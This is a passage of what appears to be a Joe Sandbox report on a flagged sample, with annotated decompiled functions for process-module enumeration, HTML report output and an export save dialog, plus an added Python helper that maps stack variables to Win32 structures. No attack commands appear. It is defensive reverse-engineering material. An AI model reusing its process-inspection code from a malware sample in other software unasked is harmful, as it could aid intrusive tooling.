								_v1132 = 0x224;
								if(E0040EAD0(_a8,  &_v316) != 0) {         // callback keeps the walk going while it returns non-zero
									_t64 =  *0x417fd4(_v8,  &_v1132);      // Module32Next(hSnap, &me) (inferred)
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);                     // PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, handle not inheritable
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);                                     // &cbNeeded
						_push(0x4000);                                     // sizeof(hmods)
						_push( &_v17516);                                  // hmods[]
						_push(_t77);                                       // hProcess
						if( *0x417fe4() != 0) {                            // EnumProcessModules(hProcess, hmods, 0x4000, &cbNeeded) (inferred)
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;                             // module count = cbNeeded / sizeof(HMODULE); never clamped to the 0x4000-byte buffer
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);         // zero the path buffer
									memset( &_v316, _t102, 0x118);         // zero the record
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));   // hmods[_v12]
									_t107 = _t107 + 0x18;                  // caller cleans up the two cdecl memset calls
									_v316 = _a4;                           // record.pid = pid
									_v312 = _t84;                          // record.hModule = hmods[_v12]
									 *0x417fdc(_v8, _t84,  &_v580, 0x104); // GetModuleFileNameExA(hProcess, hMod, path, MAX_PATH) (inferred)
									E0040E7E3( &_v308,  &_v580);           // copies the path into the record (any transformation it applies is not shown here)
									_push(0xc);                            // sizeof(MODULEINFO)
									_push( &_v32);                         // &mi
									_push(_v312);                          // hMod
									_push(_v8);                            // hProcess
									if( *0x417fe8() != 0) {                // GetModuleInformation(hProcess, hMod, &mi, 0xc) (inferred)
										_v44 = _v28;                       // record.size = mi.SizeOfImage
										_v40 = _v32;                       // record.base = mi.lpBaseOfDll
									}
									if(E0040EAD0(_a8,  &_v316) == 0) {     // callback stops the walk by returning 0
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);                                  // closes the process handle or the snapshot handle
					}
				}
				return _v20;
			}
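Reading the stack-offset names in E0040E8C6 is easier once they are tied back to the Win32 structures the function fills. The Python below is an added example, not code from the sample, from the tools it embeds or from Joe Sandbox: it resolves the decompiler's _vNNN locals onto the 32-bit MODULEENTRY32 and MODULEINFO layouts, packs and parses a MODULEENTRY32, and decodes the 0x410 mask passed to OpenProcess. It assumes that _v1132 is the first byte of a MODULEENTRY32 (the function stores 0x224 = sizeof(MODULEENTRY32) there before calling through 0x417fd8 and 0x417fd4) and that _v32 is the first byte of a MODULEINFO (0xc is passed as its size to the call through 0x417fe8); the report does not name those imports, so identifying them as Module32First/Module32Next and GetModuleInformation is an inference from the arguments. The module entry at the end is constructed for the round-trip, not taken from the analysis.

```python
"""Added example (not code from the sample or from Joe Sandbox): resolve the
decompiler's _vNNN locals in E0040E8C6 to Win32 struct fields, and decode the
OpenProcess access mask.  Assumes _v1132 is the first byte of a MODULEENTRY32
and _v32 the first byte of a MODULEINFO, as inferred from the 0x224 and 0xc
sizes passed to the unnamed imports."""
import struct

# 32-bit ANSI MODULEENTRY32 from tlhelp32.h: (field, struct format).  Every
# member is 4-byte aligned, so the natural layout equals the packed one used here.
MODULEENTRY32_FIELDS = [
    ("dwSize", "I"), ("th32ModuleID", "I"), ("th32ProcessID", "I"),
    ("GlblcntUsage", "I"), ("ProccntUsage", "I"),
    ("modBaseAddr", "I"),    # BYTE*   (4 bytes on 32-bit)
    ("modBaseSize", "I"),
    ("hModule", "I"),        # HMODULE (4 bytes on 32-bit)
    ("szModule", "256s"),
    ("szExePath", "260s"),   # MAX_PATH
]

# MODULEINFO from psapi.h: the 0xc-byte struct the PSAPI path fills at &_v32.
MODULEINFO_FIELDS = [("lpBaseOfDll", "I"), ("SizeOfImage", "I"), ("EntryPoint", "I")]

# Process access rights from winnt.h, for the 0x410 mask passed to OpenProcess.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def struct_format(fields):
    return "<" + "".join(fmt for _, fmt in fields)


def field_offsets(fields):
    """Return ({field: (offset, size)}, total size) for a packed little-endian layout."""
    offsets, off = {}, 0
    for name, fmt in fields:
        size = struct.calcsize("<" + fmt)
        offsets[name] = (off, size)
        off += size
    return offsets, off


def resolve_stack_var(var, struct_base_var, fields):
    """Map a decompiler local such as '_v1104' to (field, offset within field) of
    the struct whose first byte is the local struct_base_var (e.g. '_v1132').
    The decompiler names locals by their distance below the frame pointer, so
    struct offset N lives in local _v(base - N)."""
    rel = int(struct_base_var[2:]) - int(var[2:])
    offsets, total = field_offsets(fields)
    if not 0 <= rel < total:
        raise ValueError(f"{var} lies outside the {total:#x}-byte struct at {struct_base_var}")
    for name, (off, size) in offsets.items():
        if off <= rel < off + size:
            return name, rel - off
    raise AssertionError("unreachable: offsets cover the whole struct")


def decode_process_access(mask):
    """Names of the PROCESS_* rights set in an OpenProcess desired-access mask."""
    return [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]


def build_moduleentry32(pid, base, size, hmodule, module, path):
    """Pack a constructed MODULEENTRY32 as Module32First/Next would fill it."""
    return struct.pack(struct_format(MODULEENTRY32_FIELDS), 0x224, 0, pid, 1, 1,
                       base, size, hmodule, module.encode(), path.encode())


def parse_moduleentry32(blob):
    """Unpack a MODULEENTRY32 blob into a dict, trimming the NUL-padded strings."""
    names = [name for name, _ in MODULEENTRY32_FIELDS]
    entry = dict(zip(names, struct.unpack_from(struct_format(MODULEENTRY32_FIELDS), blob)))
    for key in ("szModule", "szExePath"):
        entry[key] = entry[key].split(b"\0", 1)[0].decode()
    return entry


def annotate_decompiled_locals():
    """The locals E0040E8C6 copies into its per-module record, named by field."""
    names = {var: resolve_stack_var(var, "_v1132", MODULEENTRY32_FIELDS)[0]
             for var in ("_v1132", "_v1112", "_v1108", "_v1104", "_v844")}
    names.update({var: resolve_stack_var(var, "_v32", MODULEINFO_FIELDS)[0]
                  for var in ("_v32", "_v28")})
    return names


if __name__ == "__main__":
    assert field_offsets(MODULEENTRY32_FIELDS)[1] == 0x224   # matches _v1132 = 0x224
    for var, field in annotate_decompiled_locals().items():
        print(f"{var:>7} -> {field}")
    print("OpenProcess(0x410):", " | ".join(decode_process_access(0x410)))
    # Constructed sample entry, round-tripped through the packer and parser.
    blob = build_moduleentry32(1234, 0x400000, 0x1A000, 0x400000, "sample.dll",
                               r"C:\Example\sample.dll")
    print(parse_moduleentry32(blob)["szExePath"])
```

Running it prints the local-to-field table; the offsets it derives (_v1104 -> hModule, _v1108 -> modBaseSize, _v1112 -> modBaseAddr, _v844 -> szExePath) line up with the assignments into the 0x118-byte record at _v316, which is how the identification of the two API families in the listing was checked.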
Statement addresses for the listing above, in order (0x00000000 marks a line with no code): 0x0040e8ce, 0x0040e8d6, 0x0040e8d8, 0x0040e8e2, 0x0040ea06, 0x0040ea0c, 0x0040ea12, 0x0040ea1b, 0x0040ea1e, 0x0040ea31, 0x0040ea38, 0x0040ea3e, 0x0040eabb, 0x0040ea53, 0x0040ea5e, 0x0040ea72, 0x0040ea78, 0x0040ea83, 0x0040ea8c, 0x0040ea8f, 0x0040ea9c, 0x0040eaa9, 0x0040eab5, 0x00000000, 0x0040eab5, 0x00000000, 0x0040eaa9, 0x00000000, 0x0040eabb, 0x0040ea1e
                                                                                                                                                                        0x0040e8f4
                                                                                                                                                                        0x0040e8fd
                                                                                                                                                                        0x0040e905
                                                                                                                                                                        0x0040e908
                                                                                                                                                                        0x0040e911
                                                                                                                                                                        0x0040e912
                                                                                                                                                                        0x0040e91d
                                                                                                                                                                        0x0040e91e
                                                                                                                                                                        0x0040e927
                                                                                                                                                                        0x0040e92d
                                                                                                                                                                        0x0040e92d
                                                                                                                                                                        0x0040e931
                                                                                                                                                                        0x0040e938
                                                                                                                                                                        0x0040e93b
                                                                                                                                                                        0x0040e94a
                                                                                                                                                                        0x0040e953
                                                                                                                                                                        0x0040e95a
                                                                                                                                                                        0x0040e96c
                                                                                                                                                                        0x0040e977
                                                                                                                                                                        0x0040e97e
                                                                                                                                                                        0x0040e982
                                                                                                                                                                        0x0040e993
                                                                                                                                                                        0x0040e999
                                                                                                                                                                        0x0040e9ab
                                                                                                                                                                        0x0040e9b0
                                                                                                                                                                        0x0040e9b5
                                                                                                                                                                        0x0040e9b6
                                                                                                                                                                        0x0040e9bc
                                                                                                                                                                        0x0040e9c7
                                                                                                                                                                        0x0040e9cc
                                                                                                                                                                        0x0040e9d2
                                                                                                                                                                        0x0040e9d2
                                                                                                                                                                        0x0040e9e6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e9ec
                                                                                                                                                                        0x0040e9f5
                                                                                                                                                                        0x0040e948
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e9fb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e9f5
                                                                                                                                                                        0x0040e94a
                                                                                                                                                                        0x0040e93b
                                                                                                                                                                        0x0040eabf
                                                                                                                                                                        0x0040eac2
                                                                                                                                                                        0x0040eac2
                                                                                                                                                                        0x0040e908
                                                                                                                                                                        0x0040eacf

                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040E3BD,00000000,00000000), ref: 0040E8FD
                                                                                                                                                                        • memset.MSVCRT ref: 0040E95A
                                                                                                                                                                        • memset.MSVCRT ref: 0040E96C
                                                                                                                                                                          • Part of subcall function 0040E7E3: strcpy.MSVCRT(?,-00000001), ref: 0040E809
                                                                                                                                                                        • memset.MSVCRT ref: 0040EA53
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040EA78
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,0040E3BD,?), ref: 0040EAC2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3799309942-0
                                                                                                                                                                        • Opcode ID: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                                                                                                                                                                        • Instruction ID: 2a82ac7989168376751b009825c1859dcdea9a7a89aff0dc4cc4404167d83f81
                                                                                                                                                                        • Opcode Fuzzy Hash: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 79512EB1A00218AFDB10DF95CD85ADEBBB8FB48304F1445AAF505A2281DB749F90CF69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			E004094DC(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				char* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				char _v48;
                                                                                                                                                                        				char _v68;
                                                                                                                                                                        				void _v96;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				char* _t53;
                                                                                                                                                                        				char* _t63;
                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                        				char _t84;
                                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                                        				signed int _t95;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        
                                                                                                                                                                        				_t69 = __ebx;
                                                                                                                                                                        				_t70 = 6;
                                                                                                                                                                        				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
                                                                                                                                                                        				_t97 = _t96 + 0xc;
                                                                                                                                                                        				asm("movsw");
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				asm("movsw");
                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                        				E00405F07(_a4, "<tr>");
                                                                                                                                                                        				_t95 = 0;
                                                                                                                                                                        				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
                                                                                                                                                                        						_v8 = _t51;
                                                                                                                                                                        						_t53 =  &_v96;
                                                                                                                                                                        						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
                                                                                                                                                                        							_t53 =  &_v48;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t91 = _a8;
                                                                                                                                                                        						_v28 = _v28 | 0xffffffff;
                                                                                                                                                                        						_v24 = _v24 | 0xffffffff;
                                                                                                                                                                        						_v20 = _v20 | 0xffffffff;
                                                                                                                                                                        						_v16 = _v16 & 0x00000000;
                                                                                                                                                                        						_v12 = _t53;
                                                                                                                                                                        						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
                                                                                                                                                                        						E0040F6E2(_v28,  &_v68);
                                                                                                                                                                        						E0040F70E( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
                                                                                                                                                                        						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
                                                                                                                                                                        						_t63 =  *(_t69 + 0x50);
                                                                                                                                                                        						_t84 =  *_t63;
                                                                                                                                                                        						if(_t84 == 0 || _t84 == 0x20) {
                                                                                                                                                                        							strcat(_t63, "&nbsp;");
                                                                                                                                                                        						}
                                                                                                                                                                        						E0040F797( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
                                                                                                                                                                        						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
                                                                                                                                                                        						E00405F07(_a4,  *(_t69 + 0x4c));
                                                                                                                                                                        						_t97 = _t97 + 0x20;
                                                                                                                                                                        						_t95 = _t95 + 1;
                                                                                                                                                                        					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
                                                                                                                                                                        				}
                                                                                                                                                                        				return E00405F07(_a4, 0x413b1c);
                                                                                                                                                                        			}
                                                                                                                                                                        0x00409551
                                                                                                                                                                        0x0040955a
                                                                                                                                                                        0x00409564
                                                                                                                                                                        0x0040957a
                                                                                                                                                                        0x0040958a
                                                                                                                                                                        0x0040958d
                                                                                                                                                                        0x00409590
                                                                                                                                                                        0x00409594
                                                                                                                                                                        0x004095a1
                                                                                                                                                                        0x004095a7
                                                                                                                                                                        0x004095b1
                                                                                                                                                                        0x004095c3
                                                                                                                                                                        0x004095ce
                                                                                                                                                                        0x004095d3
                                                                                                                                                                        0x004095d6
                                                                                                                                                                        0x004095d7
                                                                                                                                                                        0x0040951c
                                                                                                                                                                        0x004095f2

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                        • strcat.MSVCRT(?,&nbsp;), ref: 004095A1
                                                                                                                                                                        • sprintf.MSVCRT ref: 004095C3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWritesprintfstrcatstrlen
                                                                                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                        • API String ID: 3813295786-4153097237
                                                                                                                                                                        • Opcode ID: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                                                                                                                                                                        • Instruction ID: d2e4fb28aa3b1966a3fc448ecfbbe776d9831430555dea6067297da34f065eca
                                                                                                                                                                        • Opcode Fuzzy Hash: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F318F32900209AFDF15DF95C8869DE7BB5FF44314F1041AAFD10AB1E2D776A951CB84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                                                        			E00411133(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				intOrPtr* _v12;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				intOrPtr _v288;
                                                                                                                                                                        				intOrPtr _v800;
                                                                                                                                                                        				char _v1568;
                                                                                                                                                                        				char _v1824;
                                                                                                                                                                        				intOrPtr _v1828;
                                                                                                                                                                        				intOrPtr _v1840;
                                                                                                                                                                        				intOrPtr _v1844;
                                                                                                                                                                        				intOrPtr _v2100;
                                                                                                                                                                        				intOrPtr _v2612;
                                                                                                                                                                        				char _v3124;
                                                                                                                                                                        				char _v3636;
                                                                                                                                                                        				intOrPtr _v3640;
                                                                                                                                                                        				void* _v5768;
                                                                                                                                                                        				char _v5796;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				char* _t39;
                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                        				int _t60;
                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                        				int _t76;
                                                                                                                                                                        				void* _t80;
                                                                                                                                                                        
                                                                                                                                                                        				_t80 = __eflags;
                                                                                                                                                                        				E00412360(0x16a0, __ecx);
                                                                                                                                                                        				_t39 = wcslen(_a8);
                                                                                                                                                                        				_t2 =  &(_t39[1]); // 0x1
                                                                                                                                                                        				_t76 = _t2;
                                                                                                                                                                        				_push(_t76);
                                                                                                                                                                        				L00412090();
                                                                                                                                                                        				_t60 = 0;
                                                                                                                                                                        				_v8 = _t39;
                                                                                                                                                                        				 *_t39 = 0;
                                                                                                                                                                        				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
                                                                                                                                                                        				_t77 =  &_v5796;
                                                                                                                                                                        				E004104AE( &_v5796, _t80);
                                                                                                                                                                        				_v5796 = 0x41553c;
                                                                                                                                                                        				E00410B65( &_v3636);
                                                                                                                                                                        				E00410B65( &_v1824);
                                                                                                                                                                        				_t73 = _a4;
                                                                                                                                                                        				_v3640 =  *((intOrPtr*)(_t73 + 4));
                                                                                                                                                                        				_v12 = _t73;
                                                                                                                                                                        				_a8 = strlen(_v8);
                                                                                                                                                                        				E0041061F(_t47, _t77);
                                                                                                                                                                        				memcpy(_v5768, _v8, _a8);
                                                                                                                                                                        				E0041072A(_t77, _t80);
                                                                                                                                                                        				_t51 =  *((intOrPtr*)(_t73 + 4));
                                                                                                                                                                        				_v1840 = _t51;
                                                                                                                                                                        				_v28 = _t51;
                                                                                                                                                                        				if(_v2100 != 0 || _v2612 != 0) {
                                                                                                                                                                        					if(_v1844 != _t60) {
                                                                                                                                                                        						if(_v1568 != _t60) {
                                                                                                                                                                        							E004060DA(0xff,  &_v3124,  &_v1568);
                                                                                                                                                                        							_t73 = _a4;
                                                                                                                                                                        							_v1828 = _v24;
                                                                                                                                                                        							_t60 = 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((intOrPtr*)( *_t73))( &_v3636);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v288 != _t60 || _v800 != _t60) {
                                                                                                                                                                        					if(_v32 != _t60) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t73))( &_v1824);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(_v8);
                                                                                                                                                                        				L00412096();
                                                                                                                                                                        				return E00410596( &_v5796);
                                                                                                                                                                        			}


                                                                                                                                                                        APIs
                                                                                                                                                                        • wcslen.MSVCRT ref: 00411146
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104C3
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104E1
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104FC
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410525
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410549
                                                                                                                                                                        • strlen.MSVCRT ref: 004111AB
                                                                                                                                                                          • Part of subcall function 0041061F: ??3@YAXPAX@Z.MSVCRT ref: 0041062A
                                                                                                                                                                          • Part of subcall function 0041061F: ??2@YAPAXI@Z.MSVCRT ref: 00410639
                                                                                                                                                                        • memcpy.MSVCRT ref: 004111C5
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00411258
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 577244452-0
                                                                                                                                                                        • Opcode ID: 770519e61b31c83333b02cb56a71775f59d99fca928b07c7ba0596dbe0491682
                                                                                                                                                                        • Instruction ID: 068040a7654b3252a10ead66c722fc8ae16d1693d490f738ed846916017eff7d
                                                                                                                                                                        • Opcode Fuzzy Hash: 770519e61b31c83333b02cb56a71775f59d99fca928b07c7ba0596dbe0491682
                                                                                                                                                                        • Instruction Fuzzy Hash: 21314472D04219ABCF21EF65C8809DDBBB5AF49314F0481AAE608A3251CB396FD5CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
			E0040AC6E(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				char* _t23;                                  // used below; declaration missing from the decompiler output
				char _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t39;
				void* _t52;
				char _t59;
				char* _t60;
				intOrPtr _t61;

				// _v1096.._v1095: 0x400-byte output buffer that receives the assembled file-type filter
				_v1096 = 0;                                  // 0x0040ac87
				memset( &_v1095, 0, 0x3ff);                  // 0x0040ac8e
				// 0x747874 stored little-endian is the bytes 74 78 74 00, i.e. the string "txt" (default extension)
				_v8 = 0x747874;                              // 0x0040ac9b
				// _v72.._v12: eight {string-table entry, pattern} pairs. The entries come from E00407A69
				// (LoadStringA, resource IDs 0x1f5..0x1fc) and are presumably the description shown for
				// each pattern; the patterns are the export formats *.txt, *.htm;*.html, *.xml and *.csv.
				_t29 = E00407A69(0x1f5);                     // 0x0040aca2
				_t59 = "*.txt";                              // 0x0040aca7
				_v72 = _t29;                                 // 0x0040acad
				_v68 = _t59;                                 // 0x0040acb0
				_v64 = E00407A69(0x1f6);                     // 0x0040acbd
				_v60 = _t59;                                 // 0x0040acc0
				_v56 = E00407A69(0x1f7);                     // 0x0040acc9
				_v52 = _t59;                                 // 0x0040accc
				_t32 = E00407A69(0x1f8);                     // 0x0040accf
				_t60 = "*.htm;*.html";                       // 0x0040acd4
				_v48 = _t32;                                 // 0x0040acde
				_v44 = _t60;                                 // 0x0040ace1
				_v40 = E00407A69(0x1f9);                     // 0x0040acea
				_v36 = _t60;                                 // 0x0040aced
				_v32 = E00407A69(0x1fa);                     // 0x0040acfa
				_v28 = "*.xml";                              // 0x0040acfd
				_t35 = E00407A69(0x1fb);                     // 0x0040ad04
				_t61 = "*.csv";                              // 0x0040ad09
				_v24 = _t35;                                 // 0x0040ad0f
				_v20 = _t61;                                 // 0x0040ad12
				_v16 = E00407A69(0x1fc);                     // 0x0040ad1a
				_v12 = _t61;                                 // 0x0040ad29
				// assemble the 8 pairs into the filter buffer (E0040687C uses sprintf/strlen/memcpy, see APIs below)
				E0040687C( &_v1096,  &_v72, 8);              // 0x0040ad2c
				_t52 = 7;                                    // 0x0040ad35
				_t39 = E00407A69(_t52);                      // 0x0040ad36  one more string-table entry (resource ID 7), handed to the dialog
				_t23 =  &_v8;                                // 0x0040ad3e  -> "txt"
				// E004066AF wraps GetSaveFileNameA and copies the selected path with strcpy (see APIs below)
				return E004066AF(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);  // 0x0040ad5e
			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040AC8E
                                                                                                                                                                          • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                          • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                          • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,73B74DE0), ref: 00407AE4
                                                                                                                                                                          • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                          • Part of subcall function 0040687C: memset.MSVCRT ref: 0040689C
                                                                                                                                                                          • Part of subcall function 0040687C: sprintf.MSVCRT ref: 004068C9
                                                                                                                                                                          • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068D5
                                                                                                                                                                          • Part of subcall function 0040687C: memcpy.MSVCRT ref: 004068EA
                                                                                                                                                                          • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068F8
                                                                                                                                                                          • Part of subcall function 0040687C: memcpy.MSVCRT ref: 00406908
                                                                                                                                                                          • Part of subcall function 004066AF: GetSaveFileNameA.COMDLG32(?), ref: 004066FE
                                                                                                                                                                          • Part of subcall function 004066AF: strcpy.MSVCRT(?,?), ref: 00406715
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                        • API String ID: 4021364944-3614832568
                                                                                                                                                                        • Opcode ID: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                                                                                                                                                                        • Instruction ID: b1b2e5a0efe066de17158a8bc8fa7ff9efe1d0f31d50f94681ee96e1b845f603
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                                                                                                                                                                        • Instruction Fuzzy Hash: B82101B1E042199ED700EFE6D8817DEBBB4AB08704F10417FE509B7282D7382B458F5A
                                                                                                                                                                        Uniqueness

